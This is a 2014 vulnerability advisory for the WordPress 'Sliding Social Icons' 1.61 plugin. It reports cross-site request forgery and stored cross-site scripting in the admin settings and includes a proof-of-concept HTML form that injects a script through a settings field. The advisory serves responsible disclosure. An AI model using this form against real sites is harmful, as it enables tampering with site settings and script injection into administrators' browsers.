WordPress Sliding Social Icons 1.61 CSRF / XSS

`Title: WordPress 'Sliding Social Icons' plugin - CSRF/XSS  
Version: 1.61  
Reported by: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej  
Date: 2014/12/12  
Download: https://wordpress.org/plugins/sliding-social-icons/  
Notified WordPress: 2014/11/27  
----------------------------------------------------------------  
  
## Description:   
----------------------------------------------------------------  
WordPress Sliding Widgets Plugin will help your to create a sliding icon list dynamically where you can place on your website. The icons slide into the screen when you hover over them. This plugin also allows you to enter a shortcode for a contact form or newsletter or any other shortcode, shows up in a sliding screen  
  
## CSRF:  
----------------------------------------------------------------  
It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page.   
  
  
## Stored XSS:  
----------------------------------------------------------------  
Settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields.   
  
PoC:  
Log in as admin and then submit the following form.   
<form method="POST" action="http://[DOMAIN]/wp-admin/admin.php?page=wpbs_panel">   
<input type="text" name="action" value="wpbs_save_settings"><br />  
<input type="text" name="sc_social_slider_margin" value=""><script>alert(1)</script>"><br />  
<input type="text" name="sc_social_slider_save" value="Update"><br />  
<input type="submit">  
</form>  
  
  
## Solution  
----------------------------------------------------------------  
No fix available.   
  
The plugin has been closed by WordPress until it is updated.  
`